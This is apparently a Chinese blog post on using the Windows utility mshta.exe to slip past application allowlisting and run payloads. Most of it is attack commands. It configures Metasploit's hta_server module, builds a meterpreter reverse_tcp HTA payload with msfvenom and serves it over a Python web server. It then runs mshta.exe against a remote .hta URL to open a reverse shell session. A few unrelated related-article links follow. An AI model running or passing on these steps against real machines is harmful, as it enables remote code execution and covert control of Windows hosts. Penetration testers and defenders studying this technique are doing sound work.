白名单执行payload之mshta

简介

运行Microsoft HTML应用程序主机的Mshta.exe，Windows OS实用程序负责运行HTA（HTML应用程序）文件,我们可以运行JavaScript或Visual的HTML文件

实际使用

hta_server

msf配置如下
msf6 > use exploit/windows/misc/hta_server
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > set srvhost 192.168.122.1
srvhost => 192.168.122.1

运行mshta.exe http://192.168.122.1:8080/mVdVMFX2eB94I.hta获得session如下

msfvenom

生成hta文件并启动web服务
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.122.1 lport=20211 -f hta-psh > 20211.hta
python -m SimpleHTTPServer 80

设定监听如下

运行后上线如下
mshta.exe http://192.168.122.1/20211.hta

联系邮箱：yang_s1r@163.com 博客园地址：https://www.cnblogs.com/Yang34/

查看全文

相关阅读:
基础普及-Jar、War、Ear
Guice 学习（五）多接口的实现（ Many Interface Implementation）
Foundation框架
 windowsclient开发--使用、屏蔽一些快捷键
 数据结构（Java语言）——BinaryHeap简单实现
 最小生成树之Prim（普里姆）算法
 LeetCode--Remove Element
Java实现算法之--选择排序
 kvm云主机使用宿主机usb设备
 Oracle12c Client安装出现"[INS-30131]"错误“请确保当前用户具有访问临时位置所需的权限”解决办法之完整版

原文地址：https://www.cnblogs.com/Yang34/p/14404214.html